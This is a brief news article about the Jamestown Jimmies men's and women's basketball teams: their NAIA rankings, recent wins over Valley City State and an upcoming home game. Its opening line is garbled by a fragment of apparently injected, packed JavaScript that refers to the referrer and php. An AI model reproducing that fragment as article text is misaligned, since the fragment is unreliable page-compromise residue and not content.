JAMESTOWN ynfnh|var|u0026u|referrer|esyyh||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- With just two regular season games remaining the Jimmies are in a great position to make the NAIA National Tournament. Both the men’s and women’s teams are ranked inside the Top-10 and seeded at the top of the A.I.I. rankings.

Following a decisive 12-point win over Valley City St. last week the women moved up one spot to No. 7 in this weeks polls. It was the first of three games played against the Vikings that was decided by more than 2 points. The Jimmies have not lost a DAC game yet this season.

The men won at Valley City St. in dramatic fashion when Bryon Jones’ half-court heave skipped off the backboard and through the net as time expired in overtime giving the Jimmies a 80-77 win.

Jamestown has moved up to No. 9.

The Jimmies will host the Mayville St. Comets at the Civic Center tomorrow night (2/15/12) in their final home game of the season. The women will tip-off at 5:30 and the men to follow at 7:30.
